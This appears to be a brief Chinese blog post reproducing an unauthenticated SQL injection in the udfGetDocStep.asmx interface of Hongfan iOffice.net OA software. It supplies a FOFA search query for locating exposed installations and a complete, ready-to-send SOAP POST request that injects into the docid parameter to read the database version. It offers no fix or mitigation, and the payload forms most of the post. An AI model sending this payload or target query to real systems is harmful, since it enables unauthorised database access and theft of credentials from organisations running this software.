Babing
Published on 2024-08-30 / 3 Visits
0
0

H3-4红帆-OA-SQL

H3-4红帆-OA-SQL

漏洞描述:

红帆iOffice.net udfGetDocStep.asmx等接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

网站图片:

image-20240621135033690

网络测绘:

fofa语法:

FOFA:app=“红帆-ioffice”

漏洞复现:

payload:

POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetDocStep"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetDocStep xmlns="http://tempuri.org/">
        <docid>1' and @@version>0;--</docid>
    </GetDocStep>
    </soap:Body>
</soap:Envelope>

效果图:
查询数据库版本


Comment